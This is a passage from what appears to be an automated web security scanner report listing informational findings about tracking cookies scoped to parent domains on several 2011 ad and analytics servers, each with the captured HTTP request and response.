rtc_ac8M=MLuBq44HAVpDE1RBdcKRB7ZxEIAJXzMpNIiX6/DkPUHnRwu1INU7YESuLkV5mBhoj5Zf1jVUOEA+YtTPI8JufG/Cre49XXYBRXzYUblcveQ2ugG0KGJ2zDaCaA59xBUJAUsWH2wHE3djRDcpNER26fldZTABDtd4uTBdzX9g62NQniwGxHVABktEbzdrInhjUjr8DeZHE2mPTEUo; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39VEJbipn5t4pnpAaFXny/BhBCiFsbAsAnLzSYTlgg0qTOJ+Mg3DlTMEXAQTOD+7Yub7r0vZBjStqSHp0DWUhACTwZ3EiouT1cmm7wklDaOK/14Aj81c0EIOAjVSJNQ3/EJasmJU7rIdacNN0Suber3u8hlyARHsvpr0/LOSJS6bFYRSzZNKzSNQAzR12RlrciVdiZGvbIO0IrHQN6IZ5RFd0d+GqL8fZiTJZzaFjB+mKwrW9Wtwfhvi6ZzgvwXVFc+8JUgmysmlVasU4dDPRH48UbqWeyhogknLvpE7T0uymnntOnjnUXYFW/gUDr4tsrPjdAj+g49LnF7JczoY0qriSWVTmX/9B5mXyqikERRR7Wk7BtStxYE6DJh0PbDCcxaExS8LGEDu8qSMID8Jwyb+Wm4s0zH0JSE0XV2nhS+EsFzU0qn7qYVG23LOB5WEU5xepu5cA0xJ15e1tB8J0GRlXzkb1KB1wlRBGbef7TwTAltx9qrUQVr1AuDuQX3A2xbSkLeLGxARQdRtsBmY05cVPkBSIV+Ssvkd96r0ZhIBj/lNu8kK8QaokX0MDpeEz1F0u2r7Zz49jYSa3dq+PqSLFM1ySnu9PCyy02UBe92k9yjvyGFIH4lJT7rLmIikjqCRY7GUquZfOvqj/aBChSK1DHpMhLWCDF9rXnxOpnedFSOU6h5luF/mpBF2BtCkXKBeorKv7uk3WitFqzV0IC9C9BgWCUuGYfxFUgsaY2A6YyhSXKh7JqmH7Z2Twza28z3IU4s0pNAp8HN1BpbB/X82OpsvUtU9bmLPStjKw/l0cG+hCVLfXNEztRuMAXnSlSjgVHLN603CKv7wJcZ0a/VW8Og0VckJS3ggd3pkXtDl6sJAZyl8giiba1xEYmHGvdZOt4P5CUOc/cgqc3kEWkbycO4mTQjBUqxR65jDm+aIZ24qdnNdfSouAtwoNLfZUrmJJfoO04g2sewVltiFk6CJ9OrVqxL8g/cQ5sMLgAN9nx/vu1w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IH_7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vQ_l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BLx4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_IH_7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vQ_l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BLx4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_c7op="MLuBMx5WwltEVdJC1pDHXxVVQRFSxZB5VVzGA0eXFxQcE0JTcx0dirKNGop7K60NupMwPoi6rdLtmydkXXg0gitVkUe26E7B1wipX+vyz/MUyAh64f3weMIrGKJFcvdFkw39C3qx4sWW1ypxTDJMNgU1KkS+jVgIJFENEgUuRn79xfSJ5fz/1O7RmfXJ0PqBwv3R+PX0sejgmfXtzqvv9PJAFXEFDxEUFWnexeyz4erZpdno4ovl6qXb5Nb8/bvF8+CBwvzSmcL3/fZb7PkyM0of0XMcQHFvuQkjzA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMd5U+nfxIYLl18ZFrLI+JK2N4xaINkOV/MW2kt17b/HYOWgNCOJdT/cRHL6SujQ/U1MkjbzS/9Xo8c/nkc7A9gYF1T138FFPd84qYXFdfW8OktqEMQqq6EH7oUZnHv+txHi3CtGdRYH/BJWE9KeR0JpoBVQbG0SkWeRDthOpMIUsAqButGokk4HUz6miBWWTHJwiKTP5AQBe/UFH2fD2Sdx1aOU+9/9PuE0K3y4WLrYt4a7uXOxhbeEc/Y7FrFLX2kKc3sz4tQg1PvLTtEmvAmNqsQ97GZyqs2jq4yo2btb91v76B/kBu9qxX3TKrWJ2Dg3LThsz2IvLzYT3YotatnKFpm551fsjZAvkRnN0s+fNhPDb5b9qOF64fWv1LX12U2D2WLccuIizc9h3cFUHFhXAKOFWIGsKrxhzoAYRKxtmawpu4UJXkEF0rQS7HRTuN4G7mnCfcrUoX/iS3soaj1D4ACHImZXhx2FT0bb4oQBPezZJQgrIG/xslWiup/hvjD62ZujFBoorZ4N/s5bxSRGjYLZuzVz16dw1RO4fO3vtsZNBiqqh+bDV0xTBqoLLq3zTfPzDmucnr9XFMYP4lEWzZhAtZOmsZdHVh0uckbPq56oRv0YSX3TqozJ6SdPhycfyPqiTofuk/3VRabYxNEdb6NELU4ALKcOMaCiEDCiaOafFmZ+ouCdp0E/6Y8C1Hn80iuHHJ0pFL/5z4+9ubUck+RCuPYqxQ5M0m5fPvaSjH9FJKeWm7Ue7nduSxHvpoyrDSROUIcJQPc8ieY24I7W3pRGeoJKvy5TgV2kcPDuOaS/IKHmHqNZKdXwzuZsD8tAL3A02fG3/n0JEbxXjitt8b69eKaXkVznUFqYSy2zV87"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:11 GMT
Content-Length: 778

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

15.11. http://adserver.veruta.com/track.fcgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.veruta.com
Path:	/track.fcgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ueid=1461734246|1305465412|8|2; expires=Tue, 15-May-2012 01:43:23 GMT; path=/; domain=.veruta.com;
cmid=20772879917; expires=Tue, 15-May-2012 01:43:23 GMT; path=/; domain=.veruta.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track.fcgi?merchantid=854445219&category=100199&itemid=&eventid=0&ifmode=1&recommend=%7B%22dc%22%3A%224699978155357%22%2C%22slc%22%3A14%2C%22extra%22%3A%7B%22cl%22%3A%22ARMANIEXCHANGE%22%2C%22cm%22%3A%2220772879917%22%2C%22ts%22%3A%2221758503%22%7D%2C%22rc%22%3A%5B%221849367843%22%2C%2222084645718%22%2C%221849367842%22%2C%2222084642104%22%2C%2219522266448%22%2C%2222084646129%22%2C%2222084645710%22%2C%2222084645561%22%2C%2222084645689%22%2C%2220952419112%22%2C%2219779857694%22%2C%2223186672305%22%2C%2220399498260%22%2C%2220796345994%22%2C%2220796346228%22%2C%2220796346434%22%2C%2219522267016%22%2C%2220796346298%22%2C%2220796346442%22%2C%2219522266459%22%5D%7D HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://t.p.mybuys.com/webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=100199&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510198173&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ueid=1461734246|1305465412|8|2; cmid=

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 16 May 2011 01:43:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Set-cookie: ueid=1461734246|1305465412|8|2; expires=Tue, 15-May-2012 01:43:23 GMT; path=/; domain=.veruta.com;
Set-cookie: cmid=20772879917; expires=Tue, 15-May-2012 01:43:23 GMT; path=/; domain=.veruta.com;
Content-Length: 65

<html><head><title></title></head><body><div></div></body></html>

15.12. http://ak1.abmr.net/is/images3.pacsun.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/images3.pacsun.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-0668EB3294B3EE177948E12CB22A0A15F5355C2AAF43E1502DB89627D85FEA5B-87E9273CAC7B24CCAA1B06AE9455ECC3E23DC786C869DBB120B0C02D71BA2C7F; expires=Tue, 15-May-2012 01:43:57 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/images3.pacsun.com?U=/is/image/pacsun/brand_logo015&V=3-EqPfey%2f1D9pBmD8NRx64ZmwjCh0%2fIyNQLaPxgF3oSpEA74hVkEs+Hw%3d%3d&I=C53AF3B99FC4764&D=pacsun.com&01AD=1&$img_png$ HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-9FDE8D6FF0B93E7C8DEECE578BDA6E0BBA184501105039437D51821A712C7258-837B13ADA8F7B95B3C5C7549AA455999E329AA7B75212999DB7E7FE9D67A1ED5

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://images3.pacsun.com/is/image/pacsun/brand_logo015?01AD=3FgWrII50IR5Os7ZkPTcJwbX59Ay0Wsw-lQpmnM3r9JKvraUYIrNGag&01RI=C53AF3B99FC4764&01NA=&$img_png$
Expires: Mon, 16 May 2011 01:43:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:43:57 GMT
Connection: close
Set-Cookie: 01AI=2-2-0668EB3294B3EE177948E12CB22A0A15F5355C2AAF43E1502DB89627D85FEA5B-87E9273CAC7B24CCAA1B06AE9455ECC3E23DC786C869DBB120B0C02D71BA2C7F; expires=Tue, 15-May-2012 01:43:57 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

15.13. http://ak1.abmr.net/is/tag.admeld.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.admeld.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-0F97FF17A6C7B76FA80D7B5FC53051411FACF43F4A7F7A11B6662C7605FF5D2C-626242034CBFD7FF34701BF891A77CB52F1D124F418A9D21DDABD5526325DD81; expires=Tue, 15-May-2012 01:19:52 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.admeld.com?U=/ad/js/201/unitedstates/728x90/ros&V=3-zDj0qXGE9i8Llo%2fMis3xDKDB%2ft0WLurgj1Efsm+PbR%2fAKC7qQ5NQbw%3d%3d&I=B9C898CD44E1CB2&D=admeld.com&01AD=1&url= HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-3389AF6B2110C91584B3800A3008D2280B02624CDBAEFB204640673FA51D3B4E-08A683EF69549C11D0D5915A930D0F50509DF2988AAEF4FBD9DC2AD712DB8C6A

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.admeld.com/ad/js/201/unitedstates/728x90/ros?01AD=3i4PAXZoZmUJvJxITT3yLnxtVbBLLfnN53d0FNdW4p1GCvP0FeS2Bcg&01RI=B9C898CD44E1CB2&01NA=&url=
Expires: Mon, 16 May 2011 01:19:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:19:52 GMT
Connection: close
Set-Cookie: 01AI=2-2-0F97FF17A6C7B76FA80D7B5FC53051411FACF43F4A7F7A11B6662C7605FF5D2C-626242034CBFD7FF34701BF891A77CB52F1D124F418A9D21DDABD5526325DD81; expires=Tue, 15-May-2012 01:19:52 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

15.14. http://ak1.abmr.net/is/tag.contextweb.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.contextweb.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-8AFA4574C23C4E3E5689B61278CBEE7678E90262F44DBB0B16496D3104A4A06A-CE394B828D8586C238B09B24322432CAF393340623CB22B7D8AEB9FEE9D60071; expires=Tue, 15-May-2012 01:19:51 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.contextweb.com?U=/TagPublish/getjs.aspx&V=3-YKXncpZ6yuiorLD2p0BiNQa2ATw61Uvw5BBNJGtmWMtO5oAKZgOPoehYqrDJUAiY&I=AA8A1EB721E6334&D=contextweb.com&01AD=1&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=526735&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-3389AF6B2110C91584B3800A3008D2280B02624CDBAEFB204640673FA51D3B4E-08A683EF69549C11D0D5915A930D0F50509DF2988AAEF4FBD9DC2AD712DB8C6A

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.contextweb.com/TagPublish/getjs.aspx?01AD=3pIBPOU1FKibyPe4ZLKq7_tqzUD95TaMQcR0eu-1DBZ19zshB_nKXhg&01RI=AA8A1EB721E6334&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=526735&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610
Expires: Mon, 16 May 2011 01:19:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:19:51 GMT
Connection: close
Set-Cookie: 01AI=2-2-8AFA4574C23C4E3E5689B61278CBEE7678E90262F44DBB0B16496D3104A4A06A-CE394B828D8586C238B09B24322432CAF393340623CB22B7D8AEB9FEE9D60071; expires=Tue, 15-May-2012 01:19:51 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

15.15. http://ak1.abmr.net/is/www.imiclk.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.imiclk.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-5E66A717ADC4DD76B5758705389CCD2635275772D1D7A73AE679432994318A7C-93C51AAF40ABAF3BCF92DC0A8EBD07AE0472D13E24B0BF7F40C475410F3E68C9; expires=Tue, 15-May-2012 01:42:58 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.imiclk.com?U=/cgi/r.cgi&V=3-Kc8BYKXRa%2f3mr%2fgBR7fD9bEGPRU0oMvBUa601ugwimHDDKT8UnZKTwnVbZIY6rrf&I=5CBF64225A6AE68&D=www.imiclk.com&01AD=1&m=3&mid=vj1j4Xj8&did=womens HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-C76F5B44DF802B70FCC5E84FD9B3BD5A9FF992186A5201046E226D1C81E73D7D-E2C3A9E3CB58CA0A3F6A16355A29F34691A08F1700AAF52D5B1F1702200A87DD

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC&01RI=5CBF64225A6AE68&01NA=&m=3&mid=vj1j4Xj8&did=womens
Expires: Mon, 16 May 2011 01:42:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:42:58 GMT
Connection: close
Set-Cookie: 01AI=2-2-5E66A717ADC4DD76B5758705389CCD2635275772D1D7A73AE679432994318A7C-93C51AAF40ABAF3BCF92DC0A8EBD07AE0472D13E24B0BF7F40C475410F3E68C9; expires=Tue, 15-May-2012 01:42:58 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

15.16. http://analytics.apnewsregistry.com/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.apnewsregistry.com
Path:	/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uciv1=2ec34539-fad4-4d8a-8818-26ab2d9b777e; domain=apnewsregistry.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A HTTP/1.1
Host: analytics.apnewsregistry.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 303 See Other
Cache-Control: private
Date: Mon, 16 May 2011 01:19:41 GMT
Location: http://d503lhn9b3612.cloudfront.net/pixel.gif
P3P: CP="NOI PSAo OUR IND COM NAV STA"
Server: Microsoft-IIS/7.0
Set-Cookie: uciv1=2ec34539-fad4-4d8a-8818-26ab2d9b777e; domain=apnewsregistry.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Connection: keep-alive

15.17. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=7278cea-24.143.206.58-1297260492; expires=Tue, 14-May-2013 21:31:00 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035753&rn=324155331&c7=http%3A%2F%2Fpastebin.com%2Ftrends&c3=6035753&c4=http%3A%2F%2Fpastebin.com%2Ftrends&c5=Technology%20-%20News&c8=Trending%20Pastes%20at%20Pastebin.com&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: UID=7278cea-24.143.206.58-1297260492

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 15 May 2011 21:31:00 GMT
Connection: close
Set-Cookie: UID=7278cea-24.143.206.58-1297260492; expires=Tue, 14-May-2013 21:31:00 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

15.18. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 01:20:47 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035140&d.c=gif&d.o=wdgdsec&d.x=237021008&d.t=page&d.u=http%3A%2F%2Fdisneycruise.disney.go.com%2Fspecial-offers%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 16 May 2011 01:20:47 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 01:20:47 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

15.19. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Thu, 10-May-2012 01:19:51 GMT; Path=/
pb_rtb_ev=1:531292.AG-00000001389358554.0; Domain=.contextweb.com; Expires=Tue, 15-May-2012 01:19:51 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=531292&ev=AG-00000001389358554 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Cache-Control: no-cache, no-store
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Thu, 10-May-2012 01:19:51 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:531292.AG-00000001389358554.0; Domain=.contextweb.com; Expires=Tue, 15-May-2012 01:19:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 16 May 2011 01:19:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

15.20. http://c7.zedo.com/utils/ecSet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PI=h1145373Za940831Zc305003603,305003603Zs611Zt1135;expires=Wed, 15 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1145373Za940831Zc305003603%2C305003603Zs611Zt1135&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; FFgeo=2241452; FFChanCap=1595B496,121#543485#876543#675101#543481#675099|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1; FFSkp=305,3603,15,1:; FFcat=305,3603,15:496,121,14:496,121,7:496,121,9; FFad=0:15:1:5; FFCap=1595B305,212785|0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1145373Za940831Zc305003603,305003603Zs611Zt1135;expires=Wed, 15 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "637af42d-1f5-47f291fef3640"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6912
Date: Mon, 16 May 2011 01:30:23 GMT
Connection: close

15.21. http://cw-m.d.chango.com/m/cw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cw-m.d.chango.com
Path:	/m/cw

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 13 May 2021 01:20:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cw HTTP/1.1
Host: cw-m.d.chango.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
